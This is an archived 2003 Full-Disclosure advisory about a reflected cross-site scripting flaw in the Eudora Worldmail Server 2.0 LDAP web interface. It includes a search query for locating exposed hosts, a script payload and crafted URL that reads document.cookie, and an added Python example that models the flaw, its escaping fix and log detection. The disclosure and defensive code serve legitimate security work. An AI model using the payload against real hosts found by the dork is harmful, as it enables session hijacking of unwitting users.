[Full-Disclosure] Eudora Worldmail Server 2.0 -XSS Injection

From: morning_wood (se_cur_ity_at_hotmail.com)
Date: 08/16/03

    To: <full-disclosure@lists.netsys.com>, <bugtraq@securityfocus.com>
    Date: Fri, 15 Aug 2003 15:34:58 -0700
    ------------------------------------------------------------------
              - EXPL-A-2003-020 exploitlabs.com Advisory 020
    ------------------------------------------------------------------
                      -= Eudora Worldmail Server 2.0 =-

    Donnie Werner
    Aug 9, 2003

    Product:
    --------
    Eudora Worldmail Server 2.0

    http://www.qualcomm.com/
    http://www.eudora.com/worldmail/

    Vulnerability(s):
    -----------------
    1. XSS injection

    Description of product:
    -----------------------
    http://www.eudora.com/worldmail/features.html

    Banner id:

    HTTP/1.0 200 Document follows
    Server: ISOCOR web500gw 2.0.0.3
    MIME-Version: 1.0
    Date: Wednesday, 06-Aug-2003 GMT
    Content-type: text/html

    examples could be found by:

    http://www.google.com/search?num=20&hl=en&lr=&ie=ISO-8859-1&newwindow=1&saf
    e=off&q=Qpam.htm&btnG=Google+Search

    VULNERABILITY / EXPLOIT
    =======================

    Vulnerable hosts display the following:

    -------------- snip ----------------------

    A convenient hypertext interface to LDAP and X.500 Directories.

    Local domains and aliases
    Results for: entries at the top level

     Name Description
    Countries
     AE <---------------- example country
     IT
     CA
    --------------- snip --------------------

    Select a country ( "AE" used as example ) and
    you should see something like the following..

    http://[host]:8888/c%3dAE

    and a search box

    "One-level search in AE:"

    <FORM METHOD=GET ACTION="/c%3dAE">
    <A NAME="search_form">One-level search in</A> <STRONG>AE</STRONG>:<br>
    <INPUT NAME="?O" SIZE=39><INPUT TYPE=submit VALUE="Search">
    <INPUT TYPE=reset VALUE="Clear"></FORM>

    enter some cool XSS...

    <SCRIPT>alert(document.cookie);</SCRIPT>

    and get

    http://[host]:8888/c%3dAE?%3FO=%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E

    the results are rendered by the output of the formatted html.
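    As an added illustration (not part of the original advisory), the snippet
    below models the reflection described above: the value of the gateway's
    oddly named "?O" search parameter is pasted into the result page as-is,
    and HTML-escaping it on output is the fix. The host name, the log lines
    and the page fragment are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed URL in the shape the advisory shows (the host is a placeholder).
SAMPLE_URL = ("http://ldap.example.invalid:8888/c%3dAE?%3FO="
              "%3CSCRIPT%3Ealert%28document.cookie%29%3B%3C%2FSCRIPT%3E")

# Constructed access-log lines: one benign search, one carrying markup.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Aug/2003:12:00:01 +0000] "GET /c%3dAE?%3FO=Werner HTTP/1.0" 200 512',
    '10.0.0.9 - - [06/Aug/2003:12:00:07 +0000] "GET /c%3dAE?%3FO=%3CSCRIPT%3Ealert'
    '%28document.cookie%29%3B%3C%2FSCRIPT%3E HTTP/1.0" 200 640',
]


def search_term(url: str) -> str:
    """Return the decoded value of the '?O' query parameter (the search box)."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return params.get("?O", "")


def render_unsafe(term: str) -> str:
    """Models the vulnerable behaviour: the term lands in the page unescaped."""
    return f"<P>Results for: <STRONG>{term}</STRONG></P>"


def render_safe(term: str) -> str:
    """Hardened form: escape <, >, &, quotes before the term reaches the page."""
    return f"<P>Results for: <STRONG>{html.escape(term, quote=True)}</STRONG></P>"


def looks_like_markup_injection(term: str) -> bool:
    """Triage check: a directory search term has no business containing tags."""
    return "<" in term or ">" in term


def flag_suspicious_requests(lines):
    """Return the log lines whose '?O' parameter carries markup."""
    hits = []
    for line in lines:
        m = re.search(r'"GET (\S+) HTTP', line)
        # Prefix a dummy scheme/host so urlsplit treats the path as a URL.
        if m and looks_like_markup_injection(search_term("http://h" + m.group(1))):
            hits.append(line)
    return hits
```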

    yes, it's just a non-persistent XSS, but this is running as a service on
    port 8888 and is a mail processing server, so there may be other issues
    ( DoS ? ) as well.

    I believe LDAP has some DCOM connectivity, and there could be issues
    with the LDAP...

    SLAPD or X.500 Error: Not found
    An error occurred while searching the SLAPD or X.500 directory
    The error code was 32:

    No such object.
    No additional information is available. Please report errors to the
    Administrator.

    Local:
    ------
    ???

    Remote:
    -------
    yes

    Vendor Fix:
    -----------
    No fix on 0day

    Vendor Contact:
    ---------------
    Concurrent with this advisory
    eudora-custserv@qualcomm.com

    Credits:
    --------

    Donnie Werner
    morning_wood@e2-labs.com
    http://e2-labs.com

    Original at
    http://exploitlabs.com/files/advisories/EXPL-A-2003-020-eudora-worlmail-server.txt

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
